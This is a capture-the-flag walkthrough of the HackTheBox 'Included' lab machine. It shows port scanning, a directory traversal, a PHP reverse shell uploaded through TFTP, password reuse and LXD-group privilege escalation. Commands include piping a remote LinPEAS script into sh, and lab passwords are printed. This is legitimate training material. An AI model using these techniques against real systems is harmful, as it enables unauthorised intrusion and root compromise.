Included Walkthrough
After the Pathfinder Walkthrough, Here I'm with Included, so... let's hack and grab the flags.
As I mentioned before, the starting point machines are a series of 9 machines rated as "very easy" and should be rooted in a sequence. So it means, if you need to go through this box, first of all you must have a complete Pathfinder machine.
Enough talks, π₯± Letβs Get It Started π±βπ»
Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! π±βπ€
00. Start Machine β¦
To start the machine, just click on "Join Machine".
Then you can see the IP address for that machine. π€
Before going to enumeration steps we can simply ping to the IP address and check whether the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! π
As a ping result, it's TTL=63. There is only one route between machine and us (VPN). So definitely it will be a Linux machine.
01. Enumeration First β¦
01.1 Fast ports scan
As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.55-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable networkHere is the output π
So again we have only port 80 open.
01.2 Run Nmap Scripting Engine
To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.
nmap -sV -sC -oN DetailPorts.nmap -p 80 10.10.10.55 We have only port 80 open here. Now you know what is next..
01.3 Discover more on port 80
Let's open web browser and check what is inside the port 80.
By looking at the URL, we can assume that we have some Directory Traversal vulnerability here. So let's check it.
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server. source
We can easily check this using burp suite repeater tab. Let's power up burp suite and navigate to the site again.
As you can see we have Directory Traversal vulnerability. If we can upload any reverse shell script, we can call that file and get success by using this vulnerability. But do how we upload the reverse shell file? I tried so hard to find a way but I could not. π₯π₯
Then I looked deeply at all the users which were available in the /etc/passwd using directory traversal vulnerability. You know what I found there? There is a user also in TFTP . Wait what.. How did we miss that port? π€π€ Oh shoot! It's running on UDP port 69.
Let's run Nmap again and check whether that port is alive.
Yay!! It's alive. Let's try to connect to that service.
We can connect to that service and also we can upload any file using that service. Now we have an idea π‘π‘. But how do I know the exact path where that file was stored in?
Again we can check that /etc/passwd file to get an idea about the home directory.
Fine! Now we know where my file will be located after I uploaded it to the TFTP.ππ
02. Foothold
First we need to create PHP Reverse Shell. We can simply copy it from our kali webshell directory or using this site.
After editing the above sections you can copy that part of the code and paste it into the file.
Now, let's use TFTP and upload that file. Use put command to upload the file.
Then let's fire up netcat listener and check that file using Directory Traversal vulnerability. The path to file location will be /var/lib/tftpboot/filename.php
We successfully landed a reverse shell as www-data, it's good to spawn a TTY shell.
python3 -c "import pty; pty.spawn('/bin/bash')"If you look around the /home directory, we have a user called mike. Since all these boxes are connected together, [I mean, passwords are reused] we can check using the passwords we found on Pathfinder walkthrough. Let's try to su mike
Yes! It was successful and we can grab the user flag using Sheffield19 Password. Now it's time to root flag. ππ
03. Privilege Escalation
When it comes to privilege escalations, we can manually check one by one or we can simply run any automation script to do the searching for us. Since this box is the Linux box we can use LinPEAS .
First we need to copy that script to our machine.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.shThen we can run python demon server to host that file from our end.
Now we can use wgetcommand to download that file to the Included box. But here, I'm not going to download it and run. Instead of that I use curl command to run that file directly.
curl http://<YourIP>:8000/inpeas.sh | sh We can identify interesting stuff by looking at the output file. π
As you can see the mike user is in the LXD group. LXD group is a high-privileged group in Linux system.
Here I found lxd/lxc Group - Privilege escalation script from hacktricks. And I'm going to go through the second method in that article.
First, Try to clone the following repository to your host and build an alpine image.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpineAfter you executed the build-alpine file, a tar.gx file should be created. File name will be different from my one.
Now we can upload it into the server by using python demon web server and download it through wget.
Now follow the article again. The following command will import the image and create privileged container with it.
lxc image import ./alpine*.tar.gz --alias myimage
lxc init myimage mycontainer -c security.privileged=trueNext we need to mount the /root into the image.
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=trueNow Let's interact with the container.
lxc start mycontainer
lxc exec mycontainer /bin/sh
As you can see, we have landed on to the root shell. Now we can grab the root.txt file. It's located at /mnt/root/root/
04. Post Exploitation
As you can see there is a login.sql file in the /mnt/root/root directory. Let's open it.
And it reveals credentials. Daniel : >SNDv*2wzLWf
Okay... Iβll see you on the next box! Markup πββοΈπββοΈ
Find me on @twitter